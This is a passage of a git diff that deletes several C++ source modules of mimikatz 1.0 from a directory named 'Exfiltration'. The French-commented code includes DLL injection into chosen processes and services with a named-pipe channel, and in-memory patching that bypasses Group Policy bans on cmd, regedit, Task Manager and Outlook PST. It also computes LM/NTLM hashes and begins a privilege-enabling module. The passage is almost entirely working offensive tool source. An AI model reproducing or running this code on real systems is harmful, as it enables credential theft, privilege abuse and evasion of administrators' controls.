d\'une chaîne de caractères")); - return monVector; -} - -bool mod_mimikatz_hash::lm(vector<wstring> * arguments) -{ - wstring chaine, hash; - - if(!arguments->empty()) - chaine = arguments->front(); - - if(mod_hash::lm(&chaine, &hash)) - (*outputStream) << L"LM(\'" << chaine << L"\') = " << hash << endl; - else - (*outputStream) << L"Erreur de calcul du hash LM" << endl; - return true; -} - -bool mod_mimikatz_hash::ntlm(vector<wstring> * arguments) -{ - wstring chaine, hash; - - if(!arguments->empty()) - chaine = arguments->front(); - - if(mod_hash::ntlm(&chaine, &hash)) - (*outputStream) << L"NTLM(\'" << chaine << L"\') = " << hash << endl; - else - (*outputStream) << L"Erreur de calcul du hash NTLM" << endl; - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.h deleted file mode 100644 index 96ac879..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.h +++ /dev/null @@ -1,18 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_hash.h" -#include <iostream> - -class mod_mimikatz_hash -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool lm(vector<wstring> * arguments); - static bool ntlm(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.cpp deleted file mode 100644 index 012c62a..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.cpp +++ /dev/null @@ -1,25 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_impersonate.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_impersonate::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(revert, L"revert", L"RevertToSelf")); - return monVector; -} -bool mod_mimikatz_impersonate::revert(vector<wstring> * arguments) -{ - (*outputStream) << L"RevertToSelf : "; - if(RevertToSelf()) - (*outputStream) << L"ok"; - else - (*outputStream) << L"ko ; " << mod_system::getWinError(); - (*outputStream) << endl; - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.h deleted file mode 100644 index da62b37..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.h +++ /dev/null @@ -1,19 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_process.h" -#include "mod_thread.h" -#include <iostream> - -class mod_mimikatz_impersonate -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool revert(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.cpp deleted file mode 100644 index 74ca84d..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.cpp +++ /dev/null @@ -1,120 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_inject.h" -#include "..\global.h" - -mod_pipe * mod_mimikatz_inject::monCommunicator = NULL; - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_inject::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(pid, L"pid", L"Injecte une librairire communicante dans un PID")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(process, L"process", L"Injecte une librairire communicante dans un processus")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(service, L"service", L"Injecte une librairire communicante dans un service")); - return monVector; -} - -bool mod_mimikatz_inject::process(vector<wstring> * arguments) -{ - wstring processName = arguments->front(); - wstring fullLib = arguments->back(); - - mod_process::KIWI_PROCESSENTRY32 monProcess; - if(mod_process::getUniqueForName(&monProcess, &processName)) - { - (*outputStream) << L"PROCESSENTRY32(" << processName << L").th32ProcessID = " << monProcess.th32ProcessID << endl; - injectInPid(monProcess.th32ProcessID, fullLib); - } - else (*outputStream) << L"Trop, ou pas de processus : \'" << processName << L"\' mod_process::getUniqueProcessForName : " << mod_system::getWinError() << endl; - - return true; -} - -bool mod_mimikatz_inject::service(vector<wstring> * arguments) -{ - wstring serviceName = arguments->front(); - wstring fullLib = arguments->back(); - - mod_service::KIWI_SERVICE_STATUS_PROCESS monService; - if(mod_service::getUniqueForName(&monService, &serviceName)) - { - (*outputStream) << L"SERVICE(" << serviceName << L").serviceDisplayName = " << monService.serviceDisplayName << endl; - (*outputStream) << L"SERVICE(" << serviceName << L").ServiceStatusProcess.dwProcessId = " << monService.ServiceStatusProcess.dwProcessId << endl; - injectInPid(monService.ServiceStatusProcess.dwProcessId, fullLib); - } - else (*outputStream) << L"Service unique introuvable : \'" << serviceName << L"\' ; mod_service::getUniqueForName : " << mod_system::getWinError() << endl; - - return true; -} - -bool mod_mimikatz_inject::pid(vector<wstring> * arguments) -{ - wstring strPid = arguments->front(); - wstring fullLib = arguments->back(); - - DWORD pid; - wstringstream monStream(strPid); - monStream >> pid; - - injectInPid(pid, fullLib, !(arguments->size() >= 3)); - - return true; -} - -bool mod_mimikatz_inject::injectInPid(DWORD & pid, wstring & libPath, bool isComm) -{ - bool reussite = false; - - if(!isComm || (isComm && !monCommunicator)) - { - if(reussite = mod_inject::injectLibraryInPid(pid, &libPath)) - { - if(isComm) - { - wstring monBuffer = L""; - - monCommunicator = new mod_pipe(L"kiwi\\mimikatz"); - (*outputStream) << L"Attente de connexion du client..." << endl; - - if(monCommunicator->createServer()) - { - (*outputStream) << L"Serveur connecté à un client !" << endl; - if(monCommunicator->readFromPipe(monBuffer)) - { - (*outputStream) << L"Message du processus :" << endl << monBuffer << endl; - } - else - { - (*outputStream) << L"Erreur : Impossible de lire le premier message ! ; " << mod_system::getWinError() << endl; - closeThisCommunicator(); - } - } - else - { - (*outputStream) << L"Erreur : Impossible de créer un canal de communication ! ; " << mod_system::getWinError() << endl; - closeThisCommunicator(); - } - } - else - (*outputStream) << L"Injecté sans communication (legacy)" << endl; - } else (*outputStream) << L"Erreur : Impossible d\'injecter ! ; " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"Erreur : un canal de communicaton est déjà ouvert" << endl; - - return reussite; -} - - -bool mod_mimikatz_inject::closeThisCommunicator() -{ - if(monCommunicator) - { - (*outputStream) << L"Fermeture du canal de communication" << endl; - delete monCommunicator; - monCommunicator = NULL; - } - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.h deleted file mode 100644 index 92b4884..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.h +++ /dev/null @@ -1,33 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_inject.h" -#include "mod_system.h" -#include "mod_process.h" -#include "mod_service.h" -#include "mod_pipe.h" -#include <iostream> - -class mod_mimikatz_inject -{ -private: - static bool injectInPid(DWORD & pid, wstring & libPath, bool isComm = true); - static void startComm(); - -public: - static mod_pipe * monCommunicator; - static bool closeThisCommunicator(); - - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool pid(vector<wstring> * arguments); - static bool process(vector<wstring> * arguments); - static bool service(vector<wstring> * arguments); - - static bool injectlegacy(vector<wstring> * arguments); - -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.cpp deleted file mode 100644 index 0d61227..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.cpp +++ /dev/null @@ -1,140 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_minesweeper.h" -#include "..\global.h" - -char DISP_MINESWEEPER[] = "012345678.F? !!"; - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_minesweeper::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(infos, L"infos", L"Obtient des informations sur le démineur en cours")); - return monVector; -} - -bool mod_mimikatz_minesweeper::infos(vector<wstring> * arguments) -{ - structHandleAndAddr * maStruct = new structHandleAndAddr(); - if(giveHandleAndAddr(maStruct)) - { - STRUCT_MINESWEEPER_GAME monGame; - if(mod_memory::readMemory(maStruct->G, &monGame, sizeof(STRUCT_MINESWEEPER_GAME), maStruct->hMineSweeper)) - { -#ifdef _M_IX86 - if(mod_system::GLOB_Version.dwBuildNumber >= 7000) - monGame.pBoard = monGame.pBoard_WIN7x86; -#endif - STRUCT_MINESWEEPER_BOARD monBoard; - if(mod_memory::readMemory(monGame.pBoard, &monBoard, sizeof(STRUCT_MINESWEEPER_BOARD), maStruct->hMineSweeper)) - { - (*outputStream) << L"Mines : " << monBoard.nbMines << endl << - L"Dimension : " << monBoard.nbLignes << L" lignes x " << monBoard.nbColonnes << L" colonnes" << endl << - L"Champ : " << endl << endl; - - char ** monTableau; - monTableau = new char*[monBoard.nbLignes]; - for(DWORD l = 0; l < monBoard.nbLignes; l++) - monTableau[l] = new char[monBoard.nbColonnes]; - - parseField(maStruct, monBoard.ref_visibles, monTableau, true); - parseField(maStruct, monBoard.ref_mines, monTableau, false); - - for(DWORD l = 0; l < monBoard.nbLignes; l++) - { - (*outputStream) << L'\t'; - for(DWORD c = 0; c < monBoard.nbColonnes; c++) - (*outputStream) << monTableau[l][c] << L' '; - (*outputStream) << endl; - delete[] monTableau[l]; - } - delete[] monTableau; - } else (*outputStream) << L"Impossible de lire les données du plateau" << endl; - } else (*outputStream) << L"Impossible de lire les données du jeu" << endl; - CloseHandle(maStruct->hMineSweeper); - } - delete maStruct; - - return true; -} - -bool mod_mimikatz_minesweeper::parseField(structHandleAndAddr * monHandleAndAddr, PSTRUCT_MINESWEEPER_REF_ELEMENT laBase, char ** monTableau, bool isVisible) -{ - DWORD tailleElementFinal = isVisible ? sizeof(DWORD) : sizeof(BYTE); - - STRUCT_MINESWEEPER_REF_ELEMENT maRefElements; - if(mod_memory::readMemory(laBase, &maRefElements, sizeof(STRUCT_MINESWEEPER_REF_ELEMENT), monHandleAndAddr->hMineSweeper)) - { - PSTRUCT_MINESWEEPER_REF_ELEMENT * ref_colonnes_elements = new PSTRUCT_MINESWEEPER_REF_ELEMENT[maRefElements.nbElements]; - if(mod_memory::readMemory(maRefElements.elements, ref_colonnes_elements, maRefElements.nbElements * sizeof(PSTRUCT_MINESWEEPER_REF_ELEMENT), monHandleAndAddr->hMineSweeper)) - { - for(DWORD c = 0; c < maRefElements.nbElements; c++) - { - STRUCT_MINESWEEPER_REF_ELEMENT maRefColonneElement; - if(mod_memory::readMemory(ref_colonnes_elements[c], &maRefColonneElement, sizeof(STRUCT_MINESWEEPER_REF_ELEMENT), monHandleAndAddr->hMineSweeper)) - { - void * cellules = isVisible ? reinterpret_cast<void *>(new DWORD[maRefColonneElement.nbElements]) : reinterpret_cast<void *>(new BYTE[maRefColonneElement.nbElements]); - if(mod_memory::readMemory(maRefColonneElement.elements, cellules, maRefColonneElement.nbElements * tailleElementFinal, monHandleAndAddr->hMineSweeper)) - { - for(DWORD l = 0; l < maRefColonneElement.nbElements; l++) - { - if(isVisible) - monTableau[l][c] = DISP_MINESWEEPER[reinterpret_cast<DWORD *>(cellules)[l]]; - else - if(reinterpret_cast<BYTE *>(cellules)[l]) monTableau[l][c] = '*'; - } - } else (*outputStream) << L"Impossible de lire les élements de la colonne : " << c << endl; - delete[] cellules; - } else (*outputStream) << L"Impossible de lire les références de la colonne : " << c << endl; - } - } else (*outputStream) << L"Impossible de lire les références des colonnes" << endl; - delete[] ref_colonnes_elements; - } else (*outputStream) << L"Impossible de lire les références de l\'élement" << endl; - - return true; -} - -bool mod_mimikatz_minesweeper::giveHandleAndAddr(structHandleAndAddr * monHandleAndAddr) -{ -#ifdef _M_X64 - BYTE PTRN_WIN6_Game_SafeGetSingleton[] = {0x48, 0x89, 0x44, 0x24, 0x70, 0x48, 0x85, 0xc0, 0x74, 0x0a, 0x48, 0x8b, 0xc8, 0xe8}; - LONG OFFS_WIN6_ToG = -(5 + 5 + 6 + 4 + 1); -#elif defined _M_IX86 - BYTE PTRN_WIN6_Game_SafeGetSingleton[] = {0x84, 0xc0, 0x75, 0x07, 0x6a, 0x67, 0xe8}; - LONG OFFS_WIN6_ToG = sizeof(PTRN_WIN6_Game_SafeGetSingleton) + 4 + 1; -#endif - RtlZeroMemory(monHandleAndAddr, sizeof(structHandleAndAddr)); - - wstring nomDemineur(L"minesweeper.exe"); - mod_process::KIWI_PROCESSENTRY32 monDemineur; - if(mod_process::getUniqueForName(&monDemineur, &nomDemineur)) - { - monHandleAndAddr->pidMineSweeper = monDemineur.th32ProcessID; - mod_process::KIWI_MODULEENTRY32 monModule; - if(mod_process::getUniqueModuleForName(&monModule, NULL, &monDemineur.th32ProcessID)) - { - PBYTE limit = monModule.modBaseAddr + monModule.modBaseSize, ptrTemp = NULL; - if(monHandleAndAddr->hMineSweeper = OpenProcess(PROCESS_VM_READ, false, monHandleAndAddr->pidMineSweeper)) - if(mod_memory::searchMemory(monModule.modBaseAddr, limit, PTRN_WIN6_Game_SafeGetSingleton, &ptrTemp, sizeof(PTRN_WIN6_Game_SafeGetSingleton), true, monHandleAndAddr->hMineSweeper)) - { -#ifdef _M_X64 - long offsetTemp = 0; - if(mod_memory::readMemory(ptrTemp + OFFS_WIN6_ToG, &offsetTemp, sizeof(offsetTemp), monHandleAndAddr->hMineSweeper)) - mod_memory::readMemory((ptrTemp + OFFS_WIN6_ToG) + sizeof(long) + offsetTemp + 1, &monHandleAndAddr->G, sizeof(monHandleAndAddr->G), monHandleAndAddr->hMineSweeper); -#elif defined _M_IX86 - if(mod_memory::readMemory(ptrTemp + OFFS_WIN6_ToG, &ptrTemp, sizeof(ptrTemp), monHandleAndAddr->hMineSweeper)) - mod_memory::readMemory(ptrTemp, &monHandleAndAddr->G, sizeof(monHandleAndAddr->G), monHandleAndAddr->hMineSweeper); -#endif - } - } - } - - bool reussite = monHandleAndAddr->hMineSweeper && monHandleAndAddr->G; - - if(!reussite && monHandleAndAddr->hMineSweeper) - CloseHandle(monHandleAndAddr->hMineSweeper); - - return reussite; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.h deleted file mode 100644 index f80be46..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.h +++ /dev/null @@ -1,72 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_process.h" -#include "mod_memory.h" -#include "mod_system.h" -#include <iostream> - -class mod_mimikatz_minesweeper -{ -private: - typedef struct _STRUCT_MINESWEEPER_REF_ELEMENT { - DWORD nbElements; - DWORD unk0; - DWORD unk1; - PVOID elements; - DWORD unk2; - DWORD unk3; - } STRUCT_MINESWEEPER_REF_ELEMENT, *PSTRUCT_MINESWEEPER_REF_ELEMENT; - - typedef struct _STRUCT_MINESWEEPER_BOARD { - PVOID Serializer; - DWORD nbMines; - DWORD nbLignes; - DWORD nbColonnes; - DWORD unk0; - DWORD unk1; - DWORD unk2; - DWORD unk3; - DWORD unk4; - DWORD unk5; - DWORD unk6; - DWORD unk7; - DWORD unk8; - DWORD unk9; -#ifdef _M_X64 - DWORD unk_x64; -#endif - DWORD unk10; - PVOID unk11; - PSTRUCT_MINESWEEPER_REF_ELEMENT ref_visibles; - PSTRUCT_MINESWEEPER_REF_ELEMENT ref_mines; - DWORD unk12; - DWORD unk13; - } STRUCT_MINESWEEPER_BOARD, *PSTRUCT_MINESWEEPER_BOARD; - - typedef struct _STRUCT_MINESWEEPER_GAME { - PVOID Serializer; - //PVOID pGameStat; on 7x86 - PVOID pNodeBase; - PVOID pBoardCanvas; - PSTRUCT_MINESWEEPER_BOARD pBoard; - PSTRUCT_MINESWEEPER_BOARD pBoard_WIN7x86; - } STRUCT_MINESWEEPER_GAME, *PSTRUCT_MINESWEEPER_GAME; - - typedef struct structHandleAndAddr{ - HANDLE hMineSweeper; - DWORD pidMineSweeper; - PVOID G; - } structHandleAndAddr; - - static bool giveHandleAndAddr(structHandleAndAddr * monHandleAndAddr); - static bool parseField(structHandleAndAddr * monHandleAndAddr, PSTRUCT_MINESWEEPER_REF_ELEMENT laBase, char ** monTableau, bool isVisible = true); - -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - static bool infos(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.cpp deleted file mode 100644 index bfc18f1..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.cpp +++ /dev/null @@ -1,210 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_nogpo.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_nogpo::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(regedit, L"regedit", L"Lance un éditeur de registre, ignorant DisableRegistryTools")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(cmd, L"cmd", L"Lance une invite de commande, ignorant DisableCMD")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(taskmgr, L"taskmgr", L"Lance le gestionnaire de tache, ignorant DisableTaskMgr")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(olpst, L"olpst", L"Lance Outlook, ignorant DisablePst")); - return monVector; -} - -bool mod_mimikatz_nogpo::regedit(vector<wstring> * arguments) -{ - (*outputStream) << L"Editeur de registre : " << (disableSimple(L"regedit.exe", L"DisableRegistryTools", L"KiwiAndRegistryTools") ? "OK" : "KO") << endl; - return true; -} - -bool mod_mimikatz_nogpo::cmd(vector<wstring> * arguments) -{ - (*outputStream) << L"Invite de commande : " << (disableSimple(L"cmd.exe", L"DisableCMD", L"KiwiAndCMD") ? "OK" : "KO") << endl; - return true; -} - -bool mod_mimikatz_nogpo::taskmgr(vector<wstring> * arguments) -{ - (*outputStream) << L"Gestionnaire de taches : " << (disableSimple(L"taskmgr.exe", L"DisableTaskMgr", L"KiwiAndTaskMgr") ? "OK" : "KO") << endl; - return true; -} - -bool mod_mimikatz_nogpo::olpst(vector<wstring> * arguments) -{ - char szDisable[] = "DisablePst"; - char szKiwi[] = "KiwiAndPst"; - - wstring pathToOutlook; - - if(getApplicationPathFromCLSID(L"Outlook.Application", &pathToOutlook)) - { - DWORD pidOutlook = 0; - bool reussite = disableSimple(pathToOutlook, szDisable, szKiwi, &pidOutlook); - - (*outputStream) << L"Outlook avec PST : " << (reussite ? L"OK" : L"KO"); - if(reussite) - { - mod_patch::patchModuleOfPID(pidOutlook, L"olmapi32.dll", reinterpret_cast<BYTE *>(szDisable), sizeof(szDisable), reinterpret_cast<BYTE *>(szKiwi), sizeof(szKiwi)); - } - } else (*outputStream) << L"Outlook introuvable" << endl; - return true; -} - -bool mod_mimikatz_nogpo::getApplicationPathFromCLSID(wstring application, wstring * path) -{ - bool reussite = false; - - DWORD regError; - - wstring pathToApplication = L"Software\\Classes\\"; - pathToApplication.append(application); - pathToApplication.append(L"\\CLSID"); - - HKEY hApplication; - - regError = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pathToApplication.c_str(), 0, KEY_READ, &hApplication); - if(regError == ERROR_SUCCESS) - { - DWORD ApplicationType = 0; - DWORD ApplicationSize = 0; - LPBYTE monGUID = NULL; - - regError = RegQueryValueEx(hApplication, L"", NULL, &ApplicationType, monGUID, &ApplicationSize); - if(regError == ERROR_SUCCESS) - { - if(ApplicationType == REG_SZ) - { - monGUID = new BYTE[ApplicationSize]; - - regError = RegQueryValueEx(hApplication, L"", NULL, &ApplicationType, monGUID, &ApplicationSize); - if(regError == ERROR_SUCCESS) - { - wstring regPathToPath = -#ifdef _M_X64 - L"Software\\Wow6432Node\\Classes\\CLSID\\"; -#elif defined _M_IX86 - L"Software\\Classes\\CLSID\\"; -#endif - regPathToPath.append(reinterpret_cast<wchar_t *>(monGUID)); - regPathToPath.append(L"\\LocalServer32"); - - HKEY hApplicationPath; - - regError = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regPathToPath.c_str(), 0, KEY_READ, &hApplicationPath); - if(regError == ERROR_SUCCESS) - { - DWORD ApplicationPathType = 0; - DWORD ApplicationPathSize = 0; - LPBYTE monPath = NULL; - - regError = RegQueryValueEx(hApplicationPath, L"", NULL, &ApplicationPathType, monPath, &ApplicationPathSize); - if(regError == ERROR_SUCCESS) - { - if(ApplicationPathType == REG_SZ) - { - monPath = new BYTE[ApplicationPathSize]; - - regError = RegQueryValueEx(hApplicationPath, L"", NULL, &ApplicationPathType, monPath, &ApplicationPathSize); - if(reussite = (regError == ERROR_SUCCESS)) - { - path->assign(reinterpret_cast<wchar_t *>(monPath)); - } else (*outputStream) << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl; - delete[] monPath; - } else (*outputStream) << "Le type retourné par \'" << monPath << "\' n\'est pas : REG_SZ" << endl; - } else (*outputStream) << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl; - RegCloseKey(hApplicationPath); - } else (*outputStream) << "RegOpenKeyEx \'" << regPathToPath << "\' : " << mod_system::getWinError(false, regError) << endl; - } else (*outputStream) << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl; - delete[] monGUID; - } else (*outputStream) << "Le type retourné par \'" << monGUID << "\' n\'est pas : REG_SZ" << endl; - } else (*outputStream) << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl; - RegCloseKey(hApplication); - } else (*outputStream) << "RegOpenKeyEx \'" << pathToApplication << "\' : " << mod_system::getWinError(false, regError) << endl; - - return reussite; -} - - -bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, SIZE_T taillePattern, PBYTE maCleDeDepart, const void * maCleFinale, DWORD * monPID) -{ - bool reussite = false; - - PROCESS_INFORMATION * mesInfos = new PROCESS_INFORMATION(); - if(mod_process::start(&commandLine, mesInfos, true)) - { - PEB * monPeb = new PEB(); - if(mod_process::getPeb(monPeb, mesInfos->hProcess)) - { - PBYTE patternAddr = NULL; - // Ici NULL est "toléré", pas de moyen simple de connaitre la taille en mode USER :( (enfin pour le moment) - if(mod_memory::searchMemory(reinterpret_cast<PBYTE>(monPeb->ImageBaseAddress), NULL, maCleDeDepart, &patternAddr, taillePattern, true, mesInfos->hProcess)) - { - if(!(reussite = mod_memory::writeMemory(patternAddr, maCleFinale, taillePattern, mesInfos->hProcess))) - { - (*outputStream) << L"mod_memory::writeMemory " << mod_system::getWinError() << endl; - } - } - else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"mod_process::getPeb " << mod_system::getWinError() << endl; - - delete monPeb; - - if(!(ResumeThread(mesInfos->hThread) != -1)) - (*outputStream) << L"ResumeThread " << mod_system::getWinError() << endl; - - if(monPID) - { - *monPID = mesInfos->dwProcessId; - } - - WaitForInputIdle(mesInfos->hProcess, INFINITE); - - CloseHandle(mesInfos->hThread); - CloseHandle(mesInfos->hProcess); - } - else (*outputStream) << L"mod_process::execProcess " << mod_system::getWinError() << endl; - - delete mesInfos; - - return reussite; -} - -bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, wstring origKey, wstring kiwiKey, DWORD * monPID) -{ - bool reussite = false; - - if(origKey.size() == kiwiKey.size()) - { - SIZE_T taillePattern = (origKey.size() + 1) * sizeof(wchar_t); - PBYTE maCleDeDepart = reinterpret_cast<PBYTE>(const_cast<wchar_t *>(origKey.c_str())); - const void * maCleFinale = kiwiKey.c_str(); - - reussite = disableSimple(commandLine, taillePattern, maCleDeDepart, maCleFinale, monPID); - } - else (*outputStream) << L"mod_mimikatz_nogpo::disableSimple (unicode) Taille du pattern original différente du pattern cible" << endl; - - return reussite; -} - -bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, string origKey, string kiwiKey, DWORD * monPID) -{ - bool reussite = false; - - if(origKey.size() == kiwiKey.size()) - { - SIZE_T taillePattern = (origKey.size() + 1) * sizeof(char); - PBYTE maCleDeDepart = reinterpret_cast<PBYTE>(const_cast<char *>(origKey.c_str())); - const void * maCleFinale = kiwiKey.c_str(); - - reussite = disableSimple(commandLine, taillePattern, maCleDeDepart, maCleFinale, monPID); - } - else (*outputStream) << L"mod_mimikatz_nogpo::disableSimple (non-unicode) Taille du pattern original différente du pattern cible" << endl; - - return reussite; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.h deleted file mode 100644 index c96e22f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.h +++ /dev/null @@ -1,30 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_process.h" -#include "mod_memory.h" -#include "mod_patch.h" -#include <iostream> - -class mod_mimikatz_nogpo -{ -private: - static bool disableSimple(wstring commandLine, wstring origKey, wstring kiwiKey, DWORD * monPID = NULL); - static bool disableSimple(wstring commandLine, string origKey, string kiwiKey, DWORD * monPID = NULL); - static bool disableSimple(wstring commandLine, SIZE_T taillePattern, PBYTE maCleDeDepart, const void * maCleFinale, DWORD * monPID = NULL); - - static bool getApplicationPathFromCLSID(wstring application, wstring * path); - -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool regedit(vector<wstring> * arguments); - static bool cmd(vector<wstring> * arguments); - static bool taskmgr(vector<wstring> * arguments); - static bool olpst(vector<wstring> * arguments); -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp deleted file mode 100644 index 1b29486..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp +++ /dev/null @@ -1,167 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_privilege.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_privilege::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les privilèges")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(enable, L"enable", L"Active un ou plusieurs privilèges")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(remove, L"remove", L"Retire un ou plusieurs privilèges")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(disable, L"disable", L"Désactive un ou plusieurs privilèges")); - /* Raccourçis */ - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(debug, L"debug", L"Demande (ou désactive) le privilège Debug")); - 